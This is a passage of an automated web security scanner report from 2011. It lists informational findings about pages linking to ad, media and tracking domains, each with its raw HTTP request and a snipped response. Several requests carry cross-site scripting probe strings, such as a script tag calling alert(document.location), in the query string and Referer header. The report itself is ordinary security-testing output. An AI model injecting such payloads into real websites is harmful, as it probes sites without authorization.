P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyNHF0dXZ2cAN%2bpN%2bAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Thu, 09-Sep-2021 12:48:41 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4627


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
</title>

<link rel="stylesheet" href="http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.css" type="text/css">
<style type="text/css">
...[SNIP]...
<div style="overflow:hidden; height:14px;"><a href="http://info.yahoo.com/services/us/yahoo/ads/details.html" target="_blank" class="title">Ads by Yahoo!</a>
...[SNIP]...

11.32. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9403877655681298&output=html&h=60&slotname=5036914312&w=468&lmt=1315843993&flash=10.3.183&url=http%3A%2F%2Fdrupalsn.com%2F&dt=1315849749654&bpp=44&shv=r20110831&jsv=r20110719&correlator=1315849749769&frm=4&adk=705581515&ga_vid=147367049.1315849750&ga_sid=1315849750&ga_hid=312841290&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=13&biw=1155&bih=870&ref=http%3A%2F%2Fdrupal.org%2Fcases&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=143&xpc=m9E2awq0fJ&p=http%3A//drupalsn.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 12 Sep 2011 12:48:53 GMT
Server: cafe
Cache-Control: private
Content-Length: 4152
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://drupalsn.com/%26hl%3Den%26client%3Dca-pub-9403877655681298%26adU%3Dwww.Spigit.com/SharePoint%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEJJLszjZwoQSkc20ynf63vgnED5g" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110831/r20110719/abg.js"></script>
...[SNIP]...

11.33. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9403877655681298&output=html&h=250&slotname=2673726471&w=250&lmt=1315843993&flash=10.3.183&url=http%3A%2F%2Fdrupalsn.com%2F&dt=1315849751048&bpp=162&shv=r20110831&jsv=r20110719&prev_slotnames=5036914312%2C5036914312&correlator=1315849749769&frm=4&adk=3483465846&ga_vid=147367049.1315849750&ga_sid=1315849750&ga_hid=312841290&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=13&biw=1139&bih=870&ref=http%3A%2F%2Fdrupal.org%2Fcases&prodhost=googleads.g.doubleclick.net&fu=0&ifi=3&dtd=171&xpc=PT5wpNUoRY&p=http%3A//drupalsn.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 12 Sep 2011 12:48:54 GMT
Server: cafe
Cache-Control: private
Content-Length: 3901
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://drupalsn.com/%26hl%3Den%26client%3Dca-pub-9403877655681298%26adU%3Dlynda.com/Learn_Drupal%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGuO3OpW1qu4FgwG1yZWDvCVZQH9Q" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110831/r20110719/abg.js"></script>
...[SNIP]...

11.34. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9403877655681298&output=html&h=60&slotname=5036914312&w=468&lmt=1315843993&flash=10.3.183&url=http%3A%2F%2Fdrupalsn.com%2F&dt=1315849750942&bpp=37&shv=r20110831&jsv=r20110719&prev_slotnames=5036914312&correlator=1315849749769&frm=4&adk=282862421&ga_vid=147367049.1315849750&ga_sid=1315849750&ga_hid=312841290&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=13&adx=193&ady=554&biw=1155&bih=870&eid=36887102&ref=http%3A%2F%2Fdrupal.org%2Fcases&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=41&xpc=FKc0jZYiI6&p=http%3A//drupalsn.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 12 Sep 2011 12:48:53 GMT
Server: cafe
Cache-Control: private
Content-Length: 3820
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://drupalsn.com/%26hl%3Den%26client%3Dca-pub-9403877655681298%26adU%3Dwww.Artisteer.com/Drupal%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEQFb16S3OSMSWz4c1vGE9I8mtAdQ" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110831/r20110719/abg.js"></script>
...[SNIP]...

11.35. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3717378713686065&output=html&h=60&slotname=2121162070&w=468&lmt=1315849707&flash=10.3.183&url=http%3A%2F%2Fmydirtbike.com%2F&dt=1315849730940&bpp=207&shv=r20110831&jsv=r20110719&prev_slotnames=8977042794&correlator=1315849731256&frm=4&adk=1914620364&ga_vid=879222618.1315849731&ga_sid=1315849731&ga_hid=1703698942&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=droid%20sans&dfs=12&adx=576&ady=1925&biw=1139&bih=870&eid=36887102&ref=http%3A%2F%2Fdrupal.org%2Fcases&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=442&xpc=5FpE3kRdNR&p=http%3A//mydirtbike.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 12 Sep 2011 12:48:34 GMT
Server: cafe
Cache-Control: private
Content-Length: 3878
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://mydirtbike.com/%26hl%3Den%26client%3Dca-pub-3717378713686065%26adU%3Dwww.vGameNetwork.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFKBokuYZKnduBflwlj2Mhb-ZvjPA" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110831/r20110719/abg.js"></script>
...[SNIP]...

11.36. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3717378713686065&output=html&h=60&slotname=8977042794&w=468&lmt=1315849707&flash=10.3.183&url=http%3A%2F%2Fmydirtbike.com%2F&dt=1315849730845&bpp=68&shv=r20110831&jsv=r20110719&correlator=1315849731256&frm=4&adk=1877545330&ga_vid=879222618.1315849731&ga_sid=1315849731&ga_hid=1703698942&ga_fc=0&ga_wpids=UA-314227-1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=droid%20sans&dfs=12&biw=1139&bih=870&eid=36887101&ref=http%3A%2F%2Fdrupal.org%2Fcases&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=494&xpc=6pNCtgm6LR&p=http%3A//mydirtbike.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 12 Sep 2011 12:48:34 GMT
Server: cafe
Cache-Control: private
Content-Length: 4383
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://mydirtbike.com/%26hl%3Den%26client%3Dca-pub-3717378713686065%26adU%3Dwww.honda.com%26adT%3DJeremy%2BMcGrath%2BHonda%2BFilm%26gl%3DUS&amp;usg=AFQjCNE9xJZxM64yAt0n988nHaa69Qq-FA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...

11.37. http://l.yimg.com/zz/combo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /zz/combo

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/169/search-min.js HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://research.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Last-Modified: Mon, 12 Sep 2011 00:04:33 GMT
Content-Type: application/x-javascript
Expires: Sun, 30 Aug 2020 16:22:48 GMT
Date: Mon, 12 Sep 2011 00:04:33 GMT
Age: 45853
Content-Length: 19657
Server: YTS/1.19.5
Proxy-Connection: keep-alive

if(!window.ucs){window.ucs={};}YUI.add("ucs-skip-to-search",function(A){A.namespace("ucs");A.ucs.SkipToSearch=function(B){this.skipLink=B;this.init();};A.ucs.SkipToSearch.prototype={init:function(){th
...[SNIP]...
);},_hidePanel:function(C){C.halt();var B=this.container.one("div.yucs-sethp-panel"),D=this.container.one("div.pnt");D.addClass("hide");B.addClass("hide");},_loadBeacon:function(){var B=A.Node.create('<img width="0" height="0" src="http://us.lrd.yahoo.com/_ylc=X3oDMTFnNzFiMTJoBHRtX2RtZWNoA1RleHQgTGluawR0bV9sbmsDVTExMzA1NTYEdG1fbmV0A1lhaG9vIQ--/SIG=112cgufir/**http%3A/www.yahoo.com/%3Fmkt=3"/>');this.container.insert(B);},_setHpIe:function(C){C.halt();this.anchor.setStyle("behavior","url(#default#homepage)");this.anchor._node.setHomePage(this.container.one("a.yucs-sethp-panel-logo").getAttr
...[SNIP]...

11.38. http://p.raasnet.com/partners/universal/in

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/universal/in

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:06 GMT;
Content-Type: text/html
Content-Length: 207
Date: Mon, 12 Sep 2011 13:06:06 GMT
Connection: close

<img border='0' width='1' height='1' src='http://p.raasnet.com/partners/exelate'/><img border='0' width='1' height='1' src='http://rd.rlcdn.com/rd?site=43881&type=redir&url=http://dts1.raasnet.com/dts/rpf'/>

11.39. http://player.ooyala.com/player.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /player.js

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /player.js?autoplay=0&width=900&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&height=506&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr HTTP/1.1
Host: player.ooyala.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/ajaxharness1274b%22-alert(document.location)-%22faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 12 Sep 2011 13:01:56 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-9d79a4f1
X-Pad: avoid browser bug
Content-Length: 26435
Cache-Control: private, max-age=300
Date: Mon, 12 Sep 2011 13:01:57 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
<td align="center"><a href="http://www.adobe.com/go/getflash/" style="color:white"><span style="font-size:12px">
...[SNIP]...

11.40. http://player.popsugar.com/player.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.popsugar.com
Path:   /player.js

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /player.js?autoplay=0&width=900&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&height=506&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr HTTP/1.1
Host: player.popsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/ajaxharness1274b%22-alert(document.location)-%22faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D

Response

HTTP/1.1 302 Found
Date: Mon, 12 Sep 2011 13:01:54 GMT
Server: Apache
Location: http://player.ooyala.com/player.js?autoplay=0&width=900&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&height=506&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr
Content-Length: 360
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://player.ooyala.com/player.js?autoplay=0&amp;width=900&amp;deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&amp;height=506&amp;embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr">here</a>
...[SNIP]...

11.41. http://player.vimeo.com/video/19872101

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.vimeo.com
Path:   /video/19872101

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /video/19872101?title=0&byline=0&portrait=0 HTTP/1.1
Host: player.vimeo.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=256147786.803795514.1314813682.1314847150.1314978007.3; __utmz=256147786.1314978007.3.3.utmcsr=blog.sipvicious.org|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.119
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 8996
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Cargoh Artist Profile - Indigo</title><!--[if lt IE 9]><style>.a.d .z {display: block;}.a.d .bj {background: #000;filter: alpha(opacit
...[SNIP]...
</style><link rel="stylesheet" href="http://a.vimeocdn.com/p/1.4.0/css/player.core.opt.css"><script src="http://a.vimeocdn.com/p/1.4.0/js/player.core.opt.js"></script>
...[SNIP]...

11.42. http://seg.sharethis.com/getSegment.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.dome9.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 12 Sep 2011 12:40:55 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 4781


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<img src="http://al1.sharethis.com/impr?campaign=adx-impr" alt=""/>
       <img src="http://cm.g.doubleclick.net/pixel?google_nid=sha&google_cm&stid=i-048AA00A35CF5E4EC53E553302EE710A" alt=""/>                <script type="text/javascript">
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>

           <img src="http://pixel.rubiconproject.com/tap.php?v=6432&rnd1315831255" alt="" width="1" height="1" />

           <img src="http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544462&t=2&rnd1315831255" alt=""/>


           <script type="text/javascript">
...[SNIP]...

11.43. http://syndication.jobthread.com/jt/syndication/page.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.jobthread.com
Path:   /jt/syndication/page.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /jt/syndication/page.php?url_directory=&type=jobroll&s_domain_name=jobs.popsci.com&num_jobs=3&num_featured_jobs=0&display_method=default&template_name=popsci1&version=2.0 HTTP/1.1
Host: syndication.jobthread.com
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
